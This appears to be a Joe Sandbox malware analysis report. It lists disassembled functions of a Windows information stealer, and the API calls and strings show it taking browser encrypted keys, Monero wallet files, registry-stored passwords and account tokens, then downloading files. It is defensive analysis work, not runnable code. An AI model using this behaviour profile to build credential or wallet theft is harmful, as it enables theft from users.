                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 624fea2cb9acb5754bf6b3d1e9fab63cb28c9afc6ca57bc09499b17b7adefb4e
                          • Instruction ID: 4d5613127ace80dc09586c5cc2a7d7310618993d81ec33fb83f9617e701ca2da
                          • Opcode Fuzzy Hash: 624fea2cb9acb5754bf6b3d1e9fab63cb28c9afc6ca57bc09499b17b7adefb4e
                          • Instruction Fuzzy Hash: 20C176B590021D9BCB14EF60DC89FEA7778BB64304F1445D8F50AA71C2DB70AA89DF91
                          Function 00C04280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00C042EC
                          • lstrcat.KERNEL32(?,006EDD60), ref: 00C0430B
                          • lstrcat.KERNEL32(?,?), ref: 00C0431F
                          • lstrcat.KERNEL32(?,006ECF00), ref: 00C04333
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C08D90: GetFileAttributesA.KERNEL32(00000000,?,00BF1B54,?,?,00C1564C,?,?,00C10E1F), ref: 00C08D9F
                            • Part of subcall function 00BF9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BF9D39
                            • Part of subcall function 00BF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                            • Part of subcall function 00BF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                            • Part of subcall function 00BF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                            • Part of subcall function 00BF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                            • Part of subcall function 00BF99C0: LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                            • Part of subcall function 00BF99C0: CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                            • Part of subcall function 00C093C0: GlobalAlloc.KERNEL32(00000000,00C043DD,00C043DD), ref: 00C093D3
                          • StrStrA.SHLWAPI(?,006EDBC8), ref: 00C043F3
                          • GlobalFree.KERNEL32(?), ref: 00C04512
                            • Part of subcall function 00BF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9AEF
                            • Part of subcall function 00BF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B01
                            • Part of subcall function 00BF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9B2A
                            • Part of subcall function 00BF9AC0: LocalFree.KERNEL32(?,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00C044A3
                          • StrCmpCA.SHLWAPI(?,00C108D1), ref: 00C044C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00C044D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00C044E5
                          • lstrcat.KERNEL32(00000000,00C10FB8), ref: 00C044F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: ead4e9312d63073e82090143979f4ba930b2fd6f761692a04ac5281b85b12d1d
                          • Instruction ID: 94a56a6a8b22a2806448858bcfc30824584496dce1ce3aadd209b15c97dd31f8
                          • Opcode Fuzzy Hash: ead4e9312d63073e82090143979f4ba930b2fd6f761692a04ac5281b85b12d1d
                          • Instruction Fuzzy Hash: 9E718AB6900208ABCB14FBA4DC8AFEE7778AB48300F048598F645A71C1DA35DB49DF51
                          Function 00BF1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00BF12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF12B4
                            • Part of subcall function 00BF12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF12BB
                            • Part of subcall function 00BF12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BF12D7
                            • Part of subcall function 00BF12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BF12F5
                            • Part of subcall function 00BF12A0: RegCloseKey.ADVAPI32(?), ref: 00BF12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00BF134F
                          • lstrlen.KERNEL32(?), ref: 00BF135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00BF1377
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BF1465
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                            • Part of subcall function 00BF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                            • Part of subcall function 00BF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                            • Part of subcall function 00BF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                            • Part of subcall function 00BF99C0: LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                            • Part of subcall function 00BF99C0: CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00BF14EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: b282a56aaccb2c0caafdcdb58b4e050000c5f6b04f89838c1b878afe8be4af31
                          • Instruction ID: bd8b591b754cf1f509197fa93d049c7e18578d7ab21010a9c39ff7ad6a6fd817
                          • Opcode Fuzzy Hash: b282a56aaccb2c0caafdcdb58b4e050000c5f6b04f89838c1b878afe8be4af31
                          • Instruction Fuzzy Hash: 1F5113B19502199BCB15FB60DD96FED737CAF54300F4045E8B60AA20C1EE705B89DFA6
                          Function 00BF75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00BF72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BF733A
                            • Part of subcall function 00BF72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BF73B1
                            • Part of subcall function 00BF72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BF740D
                            • Part of subcall function 00BF72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BF7452
                            • Part of subcall function 00BF72D0: HeapFree.KERNEL32(00000000), ref: 00BF7459
                          • lstrcat.KERNEL32(00000000,00C117FC), ref: 00BF7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00BF7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00BF765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00BF768F
                          • lstrcat.KERNEL32(00000000,00C11804), ref: 00BF76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00BF76D3
                          • lstrcat.KERNEL32(00000000,00C11808), ref: 00BF76ED
                          • task.LIBCPMTD ref: 00BF76FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: 6033fef8551eb193a234dd56ad3726978bd7e6ce8a17e44490273715ffab95ea
                          • Instruction ID: b66fcd573d75b1ade0211e145489e9d09da9909a6f5517830f721950b30f4180
                          • Opcode Fuzzy Hash: 6033fef8551eb193a234dd56ad3726978bd7e6ce8a17e44490273715ffab95ea
                          • Instruction Fuzzy Hash: 1431017190010DDFCB08EBB5DC9ADFE77B5AB45301B184168F202B71A1DE35A98ADB51
                          Function 00BF60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                            • Part of subcall function 00BF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                          • InternetOpenA.WININET(00C10DF7,00000001,00000000,00000000,00000000), ref: 00BF610F
                          • StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BF618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BF61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00BF61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BF620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00BF6249
                          • InternetCloseHandle.WININET(?), ref: 00BF6253
                          • InternetCloseHandle.WININET(00000000), ref: 00BF6260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: de4413ce45d01ed6bc06ab1fb25783e67ff1c3ae136ccf9ecb9eb3e9696d9b73
                          • Instruction ID: d9265e6434a6f201338e33aa7764c6c10429d31a73339f8b54bd0f6b70194322
                          • Opcode Fuzzy Hash: de4413ce45d01ed6bc06ab1fb25783e67ff1c3ae136ccf9ecb9eb3e9696d9b73
                          • Instruction Fuzzy Hash: D8515EB1A0021CAFDB20DF51DC89BEE77B8EB44701F1081A9A705B71C1DB746A89DF95
                          Function 00BF72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BF733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BF73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BF740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00BF7452
                          • HeapFree.KERNEL32(00000000), ref: 00BF7459
                          • task.LIBCPMTD ref: 00BF7555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 8c22010ecbcd1c4dd1e588fb34ad71eb79238c2573b77389a281b5f3b71c1639
                          • Instruction ID: 6acc3c6c941700ccfa1449d9915ba02f54aca5201c9a7636d32faee653f435f2
                          • Opcode Fuzzy Hash: 8c22010ecbcd1c4dd1e588fb34ad71eb79238c2573b77389a281b5f3b71c1639
                          • Instruction Fuzzy Hash: 3D6109B594416C9BDB24DB50DC45BE9B7B8BF48300F0481E9E689A7281DFB05BC9CFA1
                          Function 00BFBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                          • lstrlen.KERNEL32(00000000), ref: 00BFBC9F
                            • Part of subcall function 00C08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C08E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BFBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00BFBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00BFBDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 5b02e66194fe972bb7b1ff2bfe5c6c7330c5ef74eb8a830eeb37ba4eb9c3a8f5
                          • Instruction ID: 0a5b038b3e208fd1f66373ffd710f63bec301f1de566b5d4f0fa2f8f1eb12c4b
                          • Opcode Fuzzy Hash: 5b02e66194fe972bb7b1ff2bfe5c6c7330c5ef74eb8a830eeb37ba4eb9c3a8f5
                          • Instruction Fuzzy Hash: E5B13E719102089BDF04FBA0DD96EEE7778AF54300F448568F606B71D1EF346A49EBA2
                          Function 00C06770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 4397fd95eb7702f8ec939a636fe2a9e6b394439405358254e944402ad176c385
                          • Instruction ID: a827f1221600c1bdd5f67c804668095a266d170a9fd5dfdcdc54b127ecee2957
                          • Opcode Fuzzy Hash: 4397fd95eb7702f8ec939a636fe2a9e6b394439405358254e944402ad176c385
                          • Instruction Fuzzy Hash: F5F05E3090421DEFD7449FE6E94D72C7FB0FF04703F0801AAE649A6290D6704B91DB96
                          Function 00BF4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BF4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF4FD1
                          • InternetOpenA.WININET(00C10DDF,00000000,00000000,00000000,00000000), ref: 00BF4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BF5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BF5041
                          • InternetCloseHandle.WININET(?), ref: 00BF50B9
                          • InternetCloseHandle.WININET(?), ref: 00BF50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
